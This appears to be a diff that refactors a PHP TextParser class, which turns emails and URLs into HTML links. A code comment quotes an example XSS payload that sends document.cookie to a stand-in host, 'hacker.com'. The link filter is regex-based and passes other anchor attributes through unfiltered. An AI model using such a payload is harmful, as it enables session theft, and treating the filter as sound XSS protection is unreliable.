@@ -8,43 +8,54 @@ class TextParser
88{
99 public function __invoke (string $ text ): string
1010 {
11- // bug in PHP? get rid of newlines at the beginning of text
1211 $ text = ltrim ($ text );
13-
14- // make urls and emails clickable
15- $ text = preg_replace ("/([\._a-z0-9-]+@[\.a-z0-9-]+)/i " , '<a href="mailto: \\1" class="email"> \\1</a> ' , $ text );
16- $ link_pattern = "/(.*)<a.*href\s*=\s* \"(.*?) \"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is " ;
17-
18- $ i = 0 ;
19- while (preg_match ($ link_pattern , $ text , $ matches )) {
12+ $ text = preg_replace (
13+ "/([\._a-z0-9-]+@[\.a-z0-9-]+)/i " ,
14+ '<a href="mailto: \\1" class="email"> \\1</a> ' ,
15+ $ text ,
16+ );
17+ $ linkPattern = "/(.*)<a.*href\s*=\s* \"(.*?) \"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is " ;
18+ $ link = [];
19+ $ index = 0 ;
20+ while (preg_match ($ linkPattern , $ text , $ matches )) {
2021 $ url = $ matches [2 ];
2122 $ rest = $ matches [3 ];
2223 if (!preg_match ('/^(http:)|(mailto:)|(ftp:)|(https:)/i ' , $ url )) {
2324 // avoid this
2425 //<a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)">
2526 $ url = preg_replace ('/:/ ' , '' , $ url );
2627 }
27- $ link [$ i ] = '<a href=" ' .$ url .'" ' .$ rest .'> ' .$ matches [4 ].'</a> ' ;
28- $ text = $ matches [1 ]."%% $ i %% " .$ matches [5 ];
29- ++$ i ;
28+ $ link [$ index ] = '<a href=" ' .$ url .'" ' .$ rest .'> ' .$ matches [4 ].'</a> ' ;
29+ $ text = $ matches [1 ]."%% $ index %% " .$ matches [5 ];
30+ ++$ index ;
3031 }
3132
32- $ text = preg_replace ("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " , 'http:// \\1 ' , $ text ); //make www. -> http://www.
33- $ text = preg_replace ("/(https?:\/\/)http?:\/\//i " , '\\1 ' , $ text ); //take out duplicate schema
34- $ text = preg_replace ("/(ftp:\/\/)http?:\/\//i " , '\\1 ' , $ text ); //take out duplicate schema
35- $ text = preg_replace ("/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " ,
33+ //make www. -> http://www.
34+ $ text = preg_replace ("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " , 'http:// \\1 ' , $ text );
35+ //take out duplicate schema
36+ $ text = preg_replace ("/(https?:\/\/)http?:\/\//i " , '\\1 ' , $ text );
37+ $ text = preg_replace ("/(ftp:\/\/)http?:\/\//i " , '\\1 ' , $ text );
38+ //eg-- http://kernel.org -> <a href="http://kernel.org" target="_blank">kernel.org</a>
39+ $ text = preg_replace (
40+ "/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " ,
3641 '<a href=" \\1 \\2" class="url" target="_blank"> \\2</a> ' ,
37- $ text ); //eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a>
38-
39- $ text = preg_replace ("/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@! \\-_]+)/i " ,
42+ $ text
43+ );
44+ //eg -- http://www.google.com -> <a href="http://www.google.com" target="_blank">www.google.com</a>
45+ $ text = preg_replace (
46+ "/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@! \\-_]+)/i " ,
4047 '<a href=" \\1 \\2 \\3" class="url" target="_blank"> \\2 \\3</a> ' ,
41- $ text ); //eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a>
48+ $ text
49+ );
4250
4351 // take off a possible last full stop and move it outside
44- $ text = preg_replace ("/<a href= \"(.*?)\. \" class= \"url \" target= \"_blank \">(.*)\.<\/a>/i " ,
45- '<a href=" \\1" class="url" target="_blank"> \\2</a>. ' , $ text );
52+ $ text = preg_replace (
53+ "/<a href= \"(.*?)\. \" class= \"url \" target= \"_blank \">(.*)\.<\/a>/i " ,
54+ '<a href=" \\1" class="url" target="_blank"> \\2</a>. ' ,
55+ $ text
56+ );
4657
47- for ($ j = 0 ; $ j < $ i ; ++$ j ) {
58+ for ($ j = 0 ; $ j < $ index ; ++$ j ) {
4859 $ replacement = $ link [$ j ];
4960 $ text = preg_replace ("/\%\% $ j\%\%/ " , $ replacement , $ text );
5061 }
@@ -68,6 +79,7 @@ public function __invoke(string $text): string
6879 // reverse our previous placeholders
6980 $ text = str_replace ('<!--LB--> ' , '( ' , $ text );
7081 $ text = str_replace ('<!--RB--> ' , ') ' , $ text );
82+
7183 return str_replace ('<!--DOLL--> ' , '$ ' , $ text );
7284 }
7385}
0 commit comments